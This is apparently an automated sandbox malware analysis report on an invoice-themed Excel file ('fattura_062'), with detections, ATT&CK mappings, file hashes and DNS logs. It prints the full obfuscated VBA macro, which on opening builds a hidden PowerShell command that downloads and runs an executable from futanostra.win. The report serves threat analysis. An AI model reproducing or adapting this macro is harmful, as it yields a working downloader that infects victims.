Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
MITRE ATT&CK Matrix (one line per tactic column; a number preceding a technique is the report's hit-count badge for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 22 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 111 Command and Scripting Interpreter; 11 Exploitation for Client Execution; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 22 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Install Root Certificate; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 12 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label
fattura_062 (1).xls | 87% | ReversingLabs | Document-Excel.Trojan.Chronos
fattura_062 (1).xls | 100% | Avira | X97M/Agent.85632241
fattura_062 (1).xls | 100% | Joe Sandbox ML |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
http://go.micros | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
futanostra.win | unknown | unknown | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.168.2.255 | | | | |
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1546100
                  Start date and time:2024-10-31 14:08:13 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 35s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:fattura_062 (1).xls
                  Detection:MAL
                  Classification:mal100.expl.evad.winXLS@5/12@1/1
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 2
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .xls
                  • Changed system and user locale, location and keyboard layout to Italian - Italy
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                  • Execution Graph export aborted for target powershell.exe, PID 3636 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: fattura_062 (1).xls
Time | Type | Description
09:09:24 | API Interceptor | 20x Sleep call for process: powershell.exe modified
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4742
                  Entropy (8bit):4.8105940880640246
                  Encrypted:false
                  SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                  MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                  SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                  SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                  SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):147284
                  Entropy (8bit):4.421713522050353
                  Encrypted:false
                  SSDEEP:1536:C8yL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CVJNSc83tKBAvQVCgOtmXmLpLmB
                  MD5:04CD6AD8D742796C999E0B642C215E20
                  SHA1:6F2EBE8A7C2178EB47EF4E17B2DEA0247FA016B5
                  SHA-256:BBDAFCDD334DC4C516635C3723C5F90188FBE00580191185A619FE1CACD5813F
                  SHA-512:1EA0FFB8193F0C1ADA96E74E4941D86183DC5F446494104B3E0B56F5DBB20848EA6085E3167081205808A1586146C0ABBD92B8925FAE02EA1E0F77BCDE8E1D87
                  Malicious:false
                  Reputation:low
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BB7DF04E1B0A2570657527A7E108AE23
                  SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                  SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                  SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):28672
                  Entropy (8bit):3.0596404003159368
                  Encrypted:false
                  SSDEEP:768:vvxEtjPOtioVjDGUU1qfDlaGGx+cL2QniRa:HxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnl
                  MD5:91BF70D9F7CE4AAD69F3EBC3ABBC54AC
                  SHA1:AE96904177AB6D73D7F0F433F637176EF4881EB5
                  SHA-256:3E4285F9E502FA2AF66CA99E8E8A5D312111E7B9B0514752C5C49C2151BD1A51
                  SHA-512:F5AED1CDF74DF64444877822995CF7FB873CB93715B5B8E3151FCE24A999CF1B6251165FBA98DA5CD309F31EA369CAC1549883324551610E392933C7E5C14DCB
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Wed Aug 9 12:45:36 2017, Security: 0
                  Category:dropped
                  Size (bytes):68608
                  Entropy (8bit):5.499773763083208
                  Encrypted:false
                  SSDEEP:1536:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnf9SwwLXoWdPm9QjCld:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnz
                  MD5:692F9695E34385CB89ED73F2D732D90B
                  SHA1:021F37AF47F91A1DAD221018CD2BFE725D889E37
                  SHA-256:F3FED05504B1A32AE9FAB6C7EE9BDA57E16A232DD4D864D5250706535E037AAD
                  SHA-512:4E98ECD733E50154E66986CB93F9E7DDC3939068F031B4E187EF910D5BDD0CBEE9D870990D615E121B9822BFD80A669ACDEAE06571A4D9501942F512BB6ADD8E
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Last Saved By: user, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Thu Oct 31 13:09:47 2024, Security: 0
                  Category:dropped
                  Size (bytes):116224
                  Entropy (8bit):5.152283777724364
                  Encrypted:false
                  SSDEEP:3072:4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnGUJ7Jt0rbXF5wUPJ4tUpzg:4xEtjPOtioVjDGUU1qfDlavx+W2QnGUK
                  MD5:19DD2E746F646CDC5738A912FD88A38D
                  SHA1:AC95E43F63DE5DD369BF1C355C8C3132876475EF
                  SHA-256:13C38EEBE105FE6063CA22390B4457DF1CEBE2DA6F91655612860091662052B2
                  SHA-512:D7B8A19D62C42C87F97E93C2928C7A5069677D5DBC95E094D15BF8DAED82E4F44F2A0411ED12629DBE6EF85C10C6A083725AF808F471E3EFBCF96264D313A5F8
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Wed Aug 9 12:45:36 2017, Security: 0
                  Category:dropped
                  Size (bytes):68608
                  Entropy (8bit):5.499773763083208
                  Encrypted:false
                  SSDEEP:1536:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnf9SwwLXoWdPm9QjCld:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnz
                  MD5:692F9695E34385CB89ED73F2D732D90B
                  SHA1:021F37AF47F91A1DAD221018CD2BFE725D889E37
                  SHA-256:F3FED05504B1A32AE9FAB6C7EE9BDA57E16A232DD4D864D5250706535E037AAD
                  SHA-512:4E98ECD733E50154E66986CB93F9E7DDC3939068F031B4E187EF910D5BDD0CBEE9D870990D615E121B9822BFD80A669ACDEAE06571A4D9501942F512BB6ADD8E
                  Malicious:true
                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Wed Aug 9 12:45:36 2017, Security: 0
                  Entropy (8bit):5.576342464068668
                  TrID:
                  • Microsoft Excel sheet (30009/1) 47.99%
                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                  File name:fattura_062 (1).xls
                  File size:67'584 bytes
                  MD5:e1f70fa36ceace829772dcb7acb96d39
                  SHA1:170ed63ed2926a386705365c77832c15af6c8228
                  SHA256:7d763d40795a161b3378f30a073285ba036aa5452ad6c78208a307c8cb9b3c47
                  SHA512:336b9cf6e0eb358e5cd93828f045848622b3501c06ae60f812e0d690b3f6a0e5327dfcc3fbe512c946e8c0c131eeaf6282339c128249f1679fad9cf09a104365
                  SSDEEP:1536:xxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnf9SwwLXoWdPOAVXnpd:xxEtjPOtioVjDGUU1qfDlaGGx+cL2QnC
                  TLSH:1C631829F282DA5AD91603354DD3C2E63736FC11DE17970B3248F31E2FB2A954E0766A
                  Icon Hash:276ea3a6a6b7bfbf
                  Document Type:OLE
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:True
                  Code Page:1251
                  Last Printed:2006-04-30 17:31:23
                  Create Time:2003-04-23 08:59:25
                  Last Saved Time:2017-08-09 11:45:36
                  Creating Application:Microsoft Excel
                  Security:0
                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:917504
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
                  VBA File Name:Foglio1.cls
                  Stream Size:1167
                  Attribute VB_Name = "Foglio1"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                  VBA File Name:ThisWorkbook.cls
                  Stream Size:8424
                  Attribute VB_Name = "ThisWorkbook"
                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  
                  Sub Workbook_Open()
                  If xlSecondary > 0 Then
                  nailscopper = zygotas
                  Shell nailscopper & glientveiuun, 0
                  End If
                  End Sub
                  
                  
                  Function galvolero()
                  galvolero = "$fos=''" + "',''';$h" + "it='d" + "f" + "il';$" + "fd=" + "');s" + "ta';$dr='(ne';$ed" + "='j" + "ect '" + ";$ipo=" + "'syst';$" + "kos='t.we';$rem='e" + "nt).do';$sad"
                  galvolero = galvolero + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + "a" + "';$" + "uy='" + maltibalo(3) + "';$ji" + "='" + maltibalo(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
                  End Function
                  Function magaraje()
                  madagaskarus = "e"
                  harddisks = Array(Null, Now(), Null, Now(), Null, Now(), Now(), Null, "c" + Chr(77), Now(), Now(), Now(), Now(), Null, Null)
                  tupertup = Array(Now(), Minute(Now), Second(Now), Now(), Timer(), "D" + "." & madagaskarus + "x", Timer(), Hour(Now), Timer(), Timer(), Timer(), Now())
                  magaraje = harddisks(8) & tupertup(5)
                  End Function
                  Function enchteinerdom()
                  enchteinerdom = "t"
                  enchteinerdom = enchteinerdom + "h"
                  End Function
                  Function vangafoot()
                  zeebdd = "O"
                  vangafoot = Array(Now(), Now(), Now(), Now(), Now(), Now(), Now(), Minute(Now), Second(Now), Minute(Now), Second(Now), Second(Now), "p" + "r" + zeebdd + "^" + "F", Now(), Hour(Now), Timer(), Now())
                  End Function
                  Function poltergeystore()
                  hhneg = "D"
                  valeygod = Array(Null, Null, Null, Null, Null, 1, Null, Null, Null, 1, Null, Null, "s" + "" + "^ 1" + "", Null, Null, Null, Null, Null)
                  ganovey = Array(Null, Null, 1, "  -" + "W^" & "I" + "n" & "", Null, 0, Null, Null, Null, Null, "-n" + "O^" + "", Null, Null, Null, Null, Null)
                  poolnum = Array(Null, Null, Null, 1, Null, 0, Null, Null, Null, Null, Null, Null, Null, Null, 1, "^N" + "i^N" + "t" + "", 0)
                  poltergeystore = "^." + "e" & molibdensefe & ganovey(10) + "l " + "-No" + poolnum(15) + Chr(94) & ganovey(3) & hhneg + "O^w" + valeygod(12)
                  End Function
                  Function chivasgoa()
                  singhh = Array(Null, Null, Null, Now(), Null, Now(), Null, Now(), Null, "s " + "", Null, Now(), Null, Null, Null, Null)
                  deepip = Array(Null, Now(), Null, Null, Null, Null, Null, Null, Now(), Null, Null, Null, "p" + "a^" + "", Null, Null, Null)
                  yehopol = Array(Now(), Null, "Y", Now(), Now(), Now(), Null, Null, "A" + "", Now(), Null, Now(), Null, Null, Null, Null, Null, Null)
                  chivasgoa = "  " + "B^" + yehopol(2) + deepip(12) + "S^" + singhh(9)
                  End Function
                  Function tuplook()
                  bobsleys = Array(Null, Null, Null, 1, "^he" + "l^" + "l" + "", 0, Null, Null, Null, Null, Null, Null, 0, Null, Null, Null)
                  regpistol = Array(Null, Null, Null, 1, Null, Null, Null, Null, Null, Null, Null, Null, Null, "^" + "U", Null, Null)
                  intertvn = Array(Null, " ", Null, Second(Now), Null, Second(Now), "^Ec" + "", Null, Null, Second(Now), Null, Null, Null, Null, Null, Null, Null, Second(Now))
                  caprureflags = Array(Null, Null, 1, "^E" + "R" + "S" + "", Null, Null, Null, Null, 0, Null, Null, 0, Null, Null, 0, Null)
                  neelwater = Array(Null, 1, Null, Null, Null, 0, Null, Null, Null, "w" + "", Null, Null, Null, Null, Null, Null, Null)
                  tooool = "" & "O"
                  tuplook = "p" + "^" + tooool + Array(neelwater(9) + caprureflags(3) + bobsleys(4) + poltergeystore + " -N" + "o" + vangafoot(12) + "I" + "l" + "e^" + footballr + "X" + intertvn(6) + regpistol(13) & chivasgoa)(0)
                  End Function
                  Function maltibalo(LenLetter As Integer)
                   Randomize
                   maltibalo = Space(LenLetter)
                   For iCount% = 1 To LenLetter
                   Mid(maltibalo, iCount%, 1) = Chr((Int(97 + (Rnd() * 26))))
                   Next
                  End Function
                  Function molibdensefe()
                  deopooter = "^" + "x"
                  molibdensefe = deopooter + "^e" + "^" + "  "
                  End Function
                  Function glientveiuun()
                  glientveiuun = """" + ""
                  End Function
                  Function footballr()
                  nubic = "" + "  "
                  footballr = nubic + "-" + "e"
                  End Function
                  Function zygotas()
                  tuumnote = galvolero
                  seneglrive = "/c """
                  zygotas = magaraje + "e" + " " + "  " + seneglrive + tuplook + tuumnote
                  End Function
                  
                  
                  
                  
                  

                  General
                  Stream Path:\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:107
                  Entropy:4.184829500435969
                  Base64 Encoded:True
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:276
                  Entropy:3.252686336049659
                  Base64 Encoded:False
                  General
                  Stream Path:\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:188
                  Entropy:3.546481957207964
                  Base64 Encoded:False
                  General
                  Stream Path:Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:42845
                  Entropy:6.048590502212488
                  Base64 Encoded:True
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                  CLSID:
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:479
                  Entropy:5.332529281198938
                  Base64 Encoded:True
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                  CLSID:
                  File Type:data
                  Stream Size:65
                  Entropy:2.9823486821471117
                  Base64 Encoded:False
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                  CLSID:
                  File Type:data
                  Stream Size:3631
                  Entropy:4.556088970721655
                  Base64 Encoded:False
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                  CLSID:
                  File Type:data
                  Stream Size:1778
                  Entropy:4.355087869218315
                  Base64 Encoded:False
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                  CLSID:
                  File Type:data
                  Stream Size:123
                  Entropy:2.567377753394855
                  Base64 Encoded:False
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                  CLSID:
                  File Type:data
                  Stream Size:608
                  Entropy:2.35713073489209
                  Base64 Encoded:False
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                  CLSID:
                  File Type:data
                  Stream Size:616
                  Entropy:2.8201434787369255
                  Base64 Encoded:False
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                  CLSID:
                  File Type:data
                  Stream Size:782
                  Entropy:6.437812275687657
                  Base64 Encoded:True
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Oct 31, 2024 14:09:27.290189028 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                  Oct 31, 2024 14:09:27.525120974 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                  Oct 31, 2024 14:09:27.526201010 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255
                  Oct 31, 2024 14:09:28.282591105 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255
                  Oct 31, 2024 14:09:29.046982050 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255
                  Oct 31, 2024 14:10:58.593930960 CET | 138 | 138 | 192.168.2.22 | 192.168.2.255

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Oct 31, 2024 14:09:27.290189028 CET | 192.168.2.22 | 8.8.8.8 | 0xe4fd | Standard query (0) | futanostra.win | A (IP address) | IN (0x0001) | false

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Oct 31, 2024 14:09:27.525120974 CET | 8.8.8.8 | 192.168.2.22 | 0xe4fd | Name error (3) | futanostra.win | none | none | A (IP address) | IN (0x0001) | false

                  Target ID:0
                  Start time:09:09:21
                  Start date:31/10/2024
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13f100000
                  File size:28'253'536 bytes
